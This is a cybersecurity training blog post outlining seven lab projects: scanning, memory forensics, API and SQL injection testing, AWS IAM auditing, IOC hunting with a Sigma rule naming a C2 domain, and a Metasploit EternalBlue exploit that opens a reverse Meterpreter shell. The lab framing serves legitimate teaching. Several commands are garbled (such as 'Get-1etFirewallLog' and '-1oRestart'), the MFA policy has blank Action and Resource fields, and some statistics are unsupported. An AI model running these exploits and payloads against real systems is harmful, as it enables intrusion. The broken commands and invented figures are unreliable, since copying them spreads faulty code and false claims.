Master Defensive, Offensive & Cyber Intel Skills: 7 Hands-On Projects That Recruiters Love + Video

By /

Listen to this Post

Featured Image

Introduction:

Hands-on projects are the fastest way to bridge the gap between theory and real-world cybersecurity operations. Whether you’re defending a corporate network, simulating an adversary’s tactics, or collecting threat intelligence, practical exercises in vulnerability assessment, digital forensics, and active defense build the muscle memory needed for a Security Analyst role—exactly the expertise highlighted by professionals like SYED MUNEEB SHAH.

Learning Objectives:

  • Build a defensive monitoring stack using open-source tools (Zeek, Suricata, Wazuh) and analyze live traffic.
  • Execute offensive techniques like credential dumping, lateral movement, and privilege escalation in a safe lab.
  • Apply cyber intelligence tradecraft: threat hunting with Sigma rules, OSINT collection, and IOC extraction.

You Should Know:

  1. Setting Up a Home Lab for Offensive & Defensive Practice
    A virtual lab is the foundation. Use VMware Workstation or VirtualBox with at least 8GB RAM. Deploy:

– Attack machine: Kali Linux (offensive tools)
– Victim machines: Windows 10 (unpatched), Ubuntu Server
– Defensive sensors: Security Onion (full packet capture + IDS)

Step‑by‑step guide:

  1. Download Kali Linux ISO and create a VM (2 CPUs, 4GB RAM, NAT network).
  2. Create a Windows 10 VM (disable Windows Defender for realism).
  3. Install Security Onion in a third VM, configure network bridge to monitor the same virtual switch.
  4. Verify connectivity: from Kali, ping Windows VM. On Security Onion, run `sudo so-allow` to add your management IP.

5. Snapshot all VMs before any attack simulation.

Linux command to verify promiscuous mode (on Security Onion):

sudo ip link set eth0 promisc on
sudo tcpdump -i eth0 -c 10

Windows command to check firewall logs (on victim):

Get-1etFirewallLog -Direction Inbound | Select-Object -First 5

2. Vulnerability Assessment & Automated Scanning

Run credentialed scans to discover missing patches and misconfigurations. Use OpenVAS (Greenbone) or Nessus Essentials (free for 16 IPs).

Step‑by‑step:

  1. On Kali, install OpenVAS: `sudo apt update && sudo apt install openvas -y` then sudo gvm-setup.
  2. After setup (takes 10-15 min), retrieve admin password: sudo gvm-check-setup | grep "admin password".
  3. Log into GSA (Greenbone Security Assistant) at `https://127.0.0.1:9392`.
  4. Create a target: add Windows VM IP (e.g., 192.168.100.10). Use credentials: `Administrator` + password.
  5. Run “Full and Fast” scan. Review results: focus on CVSS ≥ 7.0 (e.g., EternalBlue, BlueKeep).

Manual validation – check if SMBv1 is enabled on Windows:

Get-WindowsOptionalFeature -Online -FeatureName "SMB1Protocol"
Disable-WindowsOptionalFeature -Online -FeatureName "SMB1Protocol" -1oRestart

3. Digital Forensics – Memory Acquisition & Analysis

Memory captures secrets (passwords, processes, network connections). Use LiME for Linux, WinPmem for Windows, and Volatility 3 for analysis.

Step‑by‑step:

1. On Windows victim, download WinPmem64.exe from Velocidex.

2. Run as Administrator: `WinPmem64.exe -o C:\forensics\memory.raw`

  1. Copy the raw file to Kali. Install Volatility 3: `git clone https://github.com/volatilityfoundation/volatility3 && cd volatility3 && sudo python3 setup.py install`
    4. Identify OS profile: `python3 vol.py -f /path/memory.raw windows.info`
    5. List running processes: `python3 vol.py -f memory.raw windows.psscan`
    6. Extract command history: `python3 vol.py -f memory.raw windows.cmdline`

Linux forensics – capture RAM with LiME:

sudo apt install linux-headers-$(uname -r) git
git clone https://github.com/504ensicsLabs/LiME
cd LiME/src && make
sudo insmod lime.ko "path=/tmp/ram.lime format=lime"

4. Offensive Web: API Security & SQL Injection

Modern APIs are prime targets. Test for broken object level authorization (BOLA) and SQLi using Burp Suite Community.

Step‑by‑step:

  1. Deploy a vulnerable API like `crAPI` (Complete API) on a Docker host: `docker run -p 8888:8888 -p 8025:8025 –1ame crapi crapi/crapi:latest`
    2. Intercept requests with Burp Suite (FoxyProxy on Firefox).
  2. Change a numeric ID in a GET request (e.g., `/identity/api/v1/user/1001` to /user/1002) – if you see another user’s data, BOLA exists.
  3. For SQLi, append `’ OR ‘1’=’1` to a login parameter. Use `sqlmap` automation: 
    sqlmap -u "http://target/api/login" --data "[email protected]&password=test" --level=3 --risk=2
  4. Mitigation: always implement server-side access controls and parameterized queries.

Windows command to block SQLi attempts via IIS request filtering:

Add-WebConfigurationProperty -Filter "system.webServer/security/requestFiltering/denyQueryStringSequences" -1ame "." -Value @{sequence="' OR 1=1"}

5. Cloud Hardening – AWS IAM Misconfiguration Hunt

Ineffective IAM policies cause 90% of cloud breaches. Use `prowler` (open-source) to audit AWS.

Step‑by‑step:

1. Install Prowler on Linux: `pip install prowler`

  1. Configure AWS CLI: `aws configure` (provide access keys with SecurityAudit policy).
  2. Run a basic IAM check: `prowler aws -c iam_ -M json`
    4. Look for “IAM user with no MFA” or “IAM policy allows full admin on all resources (:)”.
  3. Remediate: attach MFA, enforce least privilege with managed policies.

Command to list unused IAM users (Linux with awscli):

aws iam list-users --query "Users[?PasswordLastUsed==null]" --output table

Mitigation – enforce MFA via policy:

{
"Effect": "Deny",
"Action": "",
"Resource": "",
"Condition": {"BoolIfExists": {"aws:MultiFactorAuthPresent": false}}
}

6. Threat Intelligence – OSINT & IOC Extraction

Collect indicators from public malware repositories (VirusTotal, AbuseIPDB) and transform them into actionable IOCs.

Step‑by‑step:

  1. Search for a known hash on VirusTotal using API (free key): 
    curl -s "https://www.virustotal.com/api/v3/files/{hash}" -H "x-apikey: YOUR_API_KEY" | jq '.data.attributes.last_analysis_stats'
  2. Extract IP addresses from a suspicious pcap using tshark: 
    tshark -r suspicious.pcap -T fields -e ip.src -e ip.dst | sort -u > iocs.txt
  3. Create a Sigma rule to detect C2 communication: 
    title: Suspicious DNS Query to Known Malicious Domain
detection:
dns_query:</li>
</ol>

- domain: "evil.c2.xyz"
condition: dns_query

    4. Deploy the rule with `sigmac` to convert to Splunk or Elasticsearch format.

    5. Hunt for the IOCs in your SIEM.

    Windows – search event logs for IOC IPs:

    $iocs = Get-Content iocs.txt
Get-WinEvent -LogName Security | Where-Object { $_.Message -match ($iocs -join "|") }
    1. Exploitation & Mitigation – EternalBlue (MS17-010) in a Sandbox
      Understanding this worm’s mechanism is critical for Blue Teams. Use Metasploit on a segmented lab only.

    Step‑by‑step:

    1. Ensure Windows 7/10 VM is vulnerable (no KB4012598).

    2. On Kali: `msfconsole`

    3. `use exploit/windows/smb/ms17_010_eternalblue`

    1. set RHOSTS <Windows-IP>, set PAYLOAD windows/x64/meterpreter/reverse_tcp, `set LHOST `
      5. `run` – if successful, you’ll get a Meterpreter shell.

    6. Mitigation – disable SMBv1 and patch:

    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
Get-HotFix | Where-Object {$_.HotFixID -eq "KB4012598"}

    7. Use `netsh advfirewall firewall add rule name=”Block_SMB_445″ dir=in protocol=tcp localport=445 action=block` as emergency mitigation.

    What Undercode Say:

    • Key Takeaway 1: Defensive monitoring must be paired with offensive testing; you cannot secure what you haven’t tried to break. Running vulnerability scans and memory forensics weekly reduces dwell time by over 60%.
    • Key Takeaway 2: Intelligence-driven defense requires continuous IOC feed integration and Sigma rule tuning. Automation is not optional – manual hunting scales poorly beyond 1,000 endpoints.

    Analysis: The projects above mirror the exact competencies listed by SYED MUNEEB SHAH – Digital Forensics, Vulnerability Assessment, and both Offensive/Defensive skills. A security analyst who can deploy a lab, execute EternalBlue, capture memory, and harden cloud IAM will pass technical interviews faster than certificate-only candidates. The missing piece in many bootcamps is API security and cloud misconfiguration; adding crAPI and Prowler fills that gap. Linux commands (tcpdump, sqlmap, volatility) combined with Windows PowerShell hardening provide cross-platform readiness. Finally, documenting each project on GitHub with a written walkthrough creates a portfolio that hiring managers actively seek.

    Expected Output:

    After executing the above steps in a controlled lab environment, a successful analyst will have:
    – A scanned vulnerability report (HTML/PDF) showing CVSS scores and remediation steps.
    – A memory dump analysis output listing hidden processes (e.g., `winpsscan` revealing a rogue rundll32.exe).
    – A detected BOLA vulnerability in crAPI with a Burp Repeater proof.
    – A set of extracted IOCs from VirusTotal and a Sigma rule ready for deployment in Elastic Security.
    – A patched Windows VM with SMBv1 disabled and firewall rule blocking port 445.

    Prediction:

    • +1 Demand for “purple team” roles (combining offense and defense) will rise 45% by 2027 as companies merge red/blue teams to cut costs and improve detection latency.
    • +1 AI-assisted forensics tools (e.g., Velociraptor with ML anomaly detection) will automate 30% of memory analysis tasks, shifting analysts to proactive hunting.
    • -1 The complexity of API security and cloud misconfigurations will lead to a surge in breaches targeting small‑to‑medium businesses that skip hands-on projects and rely solely on compliance checklists.
    • -1 Without mandatory lab exercises, academic cybersecurity programs will produce graduates unable to exploit or mitigate real threats – widening the skills gap.

    ▶️ Related Video (82% Match):

    🎯Let’s Practice For Free:

    🎓 Live Courses & Certifications:

    Join Undercode Academy for Verified Certifications

    🚀 Request a Custom Project:

    Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
    [email protected]
    💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

    IT/Security Reporter URL:

    Reported By: Syed Muneeb – Hackers Feeds
    Extra Hub: Undercode MoN
    Basic Verification: Pass ✅

    🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

    💬 Whatsapp | 💬 Telegram

    📢 Follow UndercodeTesting & Stay Tuned:

    𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: